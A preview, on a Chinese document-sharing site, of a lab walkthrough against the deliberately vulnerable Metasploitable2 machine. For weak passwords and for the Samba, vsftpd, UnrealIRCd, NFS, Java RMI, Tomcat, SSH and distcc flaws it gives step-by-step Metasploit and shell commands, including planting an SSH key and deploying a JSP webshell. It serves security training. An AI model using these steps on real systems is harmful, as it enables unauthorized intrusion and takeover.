好文档就是一把金锄头!
欢迎来到金锄头文库![会员中心]
电子文档交易市场
安卓APP | ios版本
电子文档交易市场
安卓APP | ios版本

Metasploitable2靶机漏洞-hanxu.doc

33页
  • 卖家[上传人]:hs****ma
  • 文档编号:446042212
  • 上传时间:2024-01-23
  • 文档格式:DOC
  • 文档大小:2.24MB
  • / 33 举报 版权申诉 马上下载
  • 文本预览
  • 下载提示
  • 常见问题
    • wordMetasploitable2靶机漏洞弱密码漏洞(WEAK PASSWORD)2SAMBA MS-RPC SHELL命令注入漏洞6VSFTPD源码包后门漏洞7UNREALIRCD后门漏洞9LINUX NFS共享目录配置漏洞10JAVA RMI SERVER命令执行漏洞13TOMCAT管理台默认口令漏洞15ROOT用户弱口令漏洞〔SSH爆破〕18DISTCC后门漏洞21SAMBA SYSMLINK 默认配置目录遍历漏洞22PHP CGI参数注入执行漏洞25DRUBY 远程代码执行漏洞26INGRESLOCK后门漏洞29弱密码漏洞(Weak Password)安全组织索引CVE:OSVDB:BID:原理系统或者数据库的登录用户,密码简单或者和用户名一样,容易通过暴力破解手段来获取密码参考如下:影响系统/软件所有使用用户名/密码登录的系统/软件都有可能存在此问题在Metasploitable2中,系统口令、MySQL、PostgreSQL和VNC远程登录都存在弱密码漏洞使用工具Kali-linux利用步骤Ø 系统弱密码登录1. 在kali上执行命令行telnet 7.7.5.251 232. login和password都输入msfadmin3. 登录成功,进入系统4.5. 一样的步骤,弱密码还有user/user、postgres/postgres、sys/batman、klog/123456789、service/serviceØ MySQL弱密码登录1. 在kali上执行mysql –h 7.7.5.251 –u root2. 登录成功,进入mysql系统3.Ø PostgreSQL弱密码登录1. 在kali上执行psql –h 7.7.5.251 –U postgres2. 输入密码postgres3. 登录成功,进入postgresql系统4.Ø VNC弱密码登录1. 在kali图形界面的终端中执行vncviewer 7.7.5.2512. 输入密码password3. 登录成功,进入系统4.5.攻击样本对应规如此友商防护能力Samba MS-RPC Shell命令注入漏洞安全组织索引CVE:CVE-2007-2447BID:BID-23972OSVDB:OSVDB-34700原理Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。

      如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令参考如下:://samba.org/samba/security/CVE-2007-2447.html://labs.idefense /intelligence/vulnerabilities/display.php?id=534影响系统/软件Xerox WorkCentre ProXerox WorkCentreVMWare ESX ServerTurbolinux Server/Personal/Multimedia/Home/Desktop/Appliance/FUJITrustix Secure LinuxSUSE Linux EnterpriseSun SolarisSlackware LinuxRedHat EnterpriseMandriva LinuxMandrakeSoft Corporate ServerHP HP-UXGentoo LinuxDebian LinuxApple Mac OS X使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/multi/samba/usermap_script,选择漏洞3. set RHOST 7.7.5.251,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname –a验证6.攻击样本对应规如此友商防护能力Vsftpd源码包后门漏洞安全组织索引CVE:BID:BID-48539OSVDB:OSVDB-73573原理在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“:)〞为结尾,服务器就会在6200端口监听,并且能够执行任意代码。

      参考如下:://scarybeastsecurity.blogspot /2011/07/alert-vsftpd-download-backdoored.html://pastebin /AetT9sS5影响系统/软件Vsftpd server v2.3.4使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/unix/ftp/vsftpd_234_backdoor,选择漏洞3. set RHOST 7.7.5.251,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname –a验证6.攻击样本对应规如此友商防护能力UnrealIRCd后门漏洞安全组织索引CVE:CVE-2010-2075BID:BID-40820OSVDB:OSVDB-65445原理在2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码参考如下::// unrealircd /txt/unrealsecadvisory.20100612.txt影响系统/软件Unreal UnrealIRCd3.2.8.1使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit2. use exploit/unix/irc/unreal_ircd_3281_backdoor,选择漏洞3. set RHOST 7.7.5.251,设置要攻击的机器IP4. exploit,开始攻击5. 利用成功,执行uname –a验证6.攻击样本对应规如此友商防护能力Linux NFS共享目录配置漏洞安全组织索引CVE:无OSVDB:无BID:无原理NFS 服务配置漏洞,赋予了根目录远程可写权限,导致/root/.ssh/ authorized_keys可被修改,实现远程ssh无密码登陆。

      影响系统/软件所有Linux系统的NFS服务使用工具Kali-linux利用步骤1. 在kali上执行命令行rpcinfo –p 7.7.5.251,查看nfs服务有无开启:2. 用showmount -e 7.7.5.251查看其设置的远程共享目录列表:3. 输入ssh-keygen生成rsa公钥:4. 依次输入l mount –t nfs 7.7.5.251:/ /tmp/t00l(预先创建),把7.7.5.251的根目录挂载到/tmp/t00l/下;注:如果提示如下图中错误如此需要/etc/init.d/rpcbind start来启动mountl cat /root/.ssh/id_rsa.pub >> /tmp/t00l/root/.ssh/authorized_keys,把生成的公钥追加到靶机的authorized_keys下;l ssh root7.7.5.251,实现无密码登陆攻击样本无对应规如此友商防护能力Java RMI SERVER命令执行漏洞安全组织索引CVE:无OSVDB:17535BID:无原理Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行影响系统/软件Oracle Java RMI Server使用工具Metasploit利用步骤1. Nmap –p0-65535 7.7.5.251来查看1099端口是否开启2. 依次输入以下命令:l use exploit/multi/misc/java_rmi_serverl set RHOST 7.7.5.251(靶机IP)l exploitl shell(进入meterpreter时执行)然后即可获得shell了攻击样本对应规如此友商防护能力Tomcat管理台默认口令漏洞安全组织索引CVE:无OSVDB:无BID:无原理Tomcat 管理台安装好后需要与时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell.影响系统/软件Tomcat使用工具NessusJSPwebshell利用步骤1. 访问7.7.5.251:8081,点击tomcat manager,输入tomcat/tomcat,即可进入管理台2. 在自己机器上准备好JSP webshell〔liuz.jsp〕,通过jar –cvf 来打包成liuz.war3. 通过tomcat管理台deploy刚刚打包的liuz.war4. 打包成功可以看到应用目录生成(/liuz)5. 访问7.7.5.251/liuz/liuz.jsp得到webshell攻击样本对应规如此友商防护能力Root用户弱口令漏洞〔SSH爆破〕安全组织索引CVE:无OSVDB:无BID:无原理靶机root用户存在弱口令漏洞,在使用指南里并没有指出。

      影响系统/软件Linux使用工具metasploit利用步骤1. 输入nmap –sV –O 7.7.5.251,查看SSH端口是否开启:2. 打开metasploit framework依次输入:use auxiliary/scanner/ssh/ssh_loginset RHOSTS 7.7.5.251set USERNAME rootset PASS_FILE /tmp/r00t/pass.txt(字典文件,需要预先生成)set THREADS 50run root口令爆破成功 ,口令为root3. ssh root7.7.5.251 成功登陆:攻击样本对应规如此友商防护能力Distcc后门漏洞安全组织索引CVE:CVE-2004-2687BID:OSVDB:OSVDB-13378原理Distcc用于大量代码在网络服务器上的分布式编译,但是如果配置不严格,容易被滥用执行命令,该漏洞是XCode 1.5版本与其他版本的distcc 2.x版本配置对于服务器端口的访问不限制参考如下:://cve.mitre.org/cgi-bin/cvename.cgi?name=2004-2687影响系统/软件distcc 2.x使用工具Kali,Metasploit利用步骤1. 在kali中执行msfconsole,启动metasploit。

      点击阅读更多内容
      关于金锄头网 - 版权申诉 - 免责声明 - 诚邀英才 - 联系我们
      手机版 | 川公网安备 51140202000112号 | 经营许可证(蜀ICP备13022795号)
      ©2008-2016 by Sichuan Goldhoe Inc. All Rights Reserved.